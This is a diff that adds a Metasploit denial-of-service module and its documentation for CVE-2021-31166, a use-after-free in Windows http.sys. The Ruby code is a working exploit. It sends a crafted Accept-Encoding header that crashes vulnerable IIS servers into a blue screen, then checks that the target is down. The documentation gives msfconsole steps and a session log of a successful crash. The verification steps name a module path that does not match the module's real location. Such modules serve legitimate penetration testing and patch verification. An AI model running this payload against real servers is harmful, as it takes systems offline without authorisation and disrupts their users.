Add CVE-2021-31166 DoS Module

documentation/modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.md

@@ -0,0 +1,108 @@
+## Vulnerable Application
+Windows 10 and Windows Server version 20H2 and 2004 servers who do not
+have KB5003173 installed to address CVE-2021-31166 are affected.
+
+The vulnerability occurs due to a use-after-free (UAF) bug in `http.sys`'s `UlpParseContentCoding`
+function whereby a local `LIST_ENTRY` item has items appended to it but the `LIST_ENTRY` structure
+is not `NULL`'d out after it finished being used. An attacker can abuse this to trigger a code path
+that free's every entry of the local `LIST_ENTRY` structure, which will be linked to in the `Request`
+object this function uses to handle the incoming request. The `Request` object will then be used later
+on in the code resulting in a UAF vulnerability.
+
+Note that whilst this exploit tries to target IIS servers, in theory any
+component that uses `http.sys` could be vulnerable, including client programs
+which use `http.sys` to connect to servers.
+
+The module itself will use this vulnerability to cause a invalid memory access exception error in `http.sys`
+by sending a request with a specially crafted `Accept-Encoding` header to the target IIS server. Since
+`http.sys` is a kernel module, this will result in a BSOD on the target system. This will cause IIS to go down
+for a period of time until the server reboots and IIS restarts again.
+
+## Verification Steps
+1. Start `msfconsole`
+1. `use exploit/windows/iis/http_sys_accept_encoding_dos_cve_2021_31166`
+1. `set RHOST <ip>`
+1. `exploit`
+1. **Verify** that the target server is down.
+
+## Options
+
+### RHOST
+
+ - **Required**
+ - Type: **address**
+ - *No default value*
+
+IP address or hostname of the target IIS server.
+
+### RPORT
+
+ - **Required**
+ - Type: **integer**
+ - Default value: **80**
+
+The port on the target server where IIS is running.
+
+### TARGETURI
+
+ - **Optional**
+ - Type: **string**
+ - Default value: **/**
+
+The base URL of the IIS install on the target server.
+
+## Scenarios
+
+### Windows 10 20H2 Build 19042.685 With IIS Installed
+```text
+ ~/git/metasploit-framework │ iis_dos_cve2022_21907 ?18  ./msfconsole
+
+IIIIII    dTb.dTb        _.---._
+  II     4'  v  'B   .'"".'/|\`.""'.
+  II     6.     .P  :  .' / | \ `.  :
+  II     'T;. .;P'  '.'  /  |  \  `.'
+  II      'T; ;P'    `. /   |   \ .'
+IIIIII     'YvP'       `-.__|__.-'
+
+I love shells --egypt
+
+
+       =[ metasploit v6.1.34-dev-88b17b79fe               ]
++ -- --=[ 2209 exploits - 1171 auxiliary - 395 post       ]
++ -- --=[ 600 payloads - 45 encoders - 11 nops            ]
++ -- --=[ 9 evasion                                       ]
+
+Metasploit tip: You can use help to view all
+available commands
+
+[*] Starting persistent handler(s)...
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
+msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > show options
+Module options (auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:hos
+                                         t:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid
+                                         7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      80               yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the IIS Server.
+   VHOST                       no        HTTP server virtual host
+
+msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > set RHOSTS 172.22.216.145
+RHOSTS => 172.22.216.145
+msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) > exploit
+[*] Running module against 172.22.216.145
+
+[*] Connecting to target to make sure its alive...
+[+] Successfully connected to target. Sending payload...
+[+] Payload was sent to the target server.
+[*] Checking that the server is down...
+[+] Target is down.
+[*] Auxiliary module execution completed
+msf6 auxiliary(dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166) >
+```
+
+![Metasploit demonstration](https://mauricelambert.github.io/vulnerability/images/CVE-2021-31166_demo.gif "Metasploit demonstration")

modules/auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166.rb

@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows IIS HTTP Protocol Stack DOS',
+        'Description' => %q{
+          This module exploits CVE-2021-31166, a UAF bug in http.sys
+          when parsing specially crafted Accept-Encoding headers
+          that was patched by Microsoft in May 2021, on vulnerable
+          IIS servers. Successful exploitation will result in
+          the target computer BSOD'ing before subsequently rebooting.
+          Note that the target IIS server may or may not come back up,
+          this depends on the target's settings as to whether IIS
+          is configured to start on reboot.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Max',                                             # Aka @_mxms. Vulnerability discovery
+          'Stefan Blair',                                    # Aka @fzzyhd1. Vulnerability discovery
+          'Axel Souchet',                                    # Aka @0vercl0k. PoC exploit
+          'Maurice LAMBERT <mauricelambert434[at]gmail.com>' # msf module
+        ],
+        'Platform' => 'win',
+        'References' => [
+          ['CVE', '2021-31166'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-31166'],
+          ['URL', 'https://github.com/mauricelambert/CVE-2021-31166'],
+          ['URL', 'https://twitter.com/metr0/status/1392631376592076805'],
+          ['URL', 'https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166']
+        ],
+        'DisclosureDate' => '2021-05-11',
+        'Notes' => {
+          'Stability' => [CRASH_OS_RESTARTS],
+          'Reliability' => [IOC_IN_LOGS],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'TARGETURI', [true, 'The URI of the IIS Server.', '/']
+        )
+      ]
+    )
+  end
+
+  # This module performs a DOS attack using a simple HTTP request.
+  def run
+    print_status('Connecting to target to make sure its alive...')
+
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, ''),
+      'method' => 'GET'
+    )
+
+    if res.nil?
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the target IIS server - no response")
+    end
+
+    print_good('Successfully connected to target. Sending payload...')
+
+    payload =
+      "#{Rex::Text.rand_text_alpha(5)}, #{Rex::Text.rand_text_alpha(3)}, ,"
+
+    exploit_headers = {
+      'Accept-Encoding' => payload
+    }
+
+    begin
+      send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, ''),
+        'timeout' => 1, # short timeout -> the server should not respond
+        'method' => 'GET',
+        'headers' => exploit_headers
+      })
+    rescue Rex::ConnectionError, Errno::ECONNRESET
+      print_good('Connection reset by target server or connection failed when sending the malicious payload!')
+    ensure
+      print_good('Payload was sent to the target server.')
+      print_status('Checking that the server is down...')
+    end
+
+    begin
+      res = send_request_cgi(
+        'uri' => normalize_uri(target_uri.path, ''),
+        'method' => 'GET'
+      )
+
+      if res.nil?
+        print_good('Target is down.')
+      else
+        print_error('Target appears to still be alive. It may have not received the packet due to network filtering, or it may not be vulnerable.')
+      end
+    rescue Rex::ConnectionError, Errno::ECONNRESET
+      print_good('Target is down.')
+    end
+  end
+end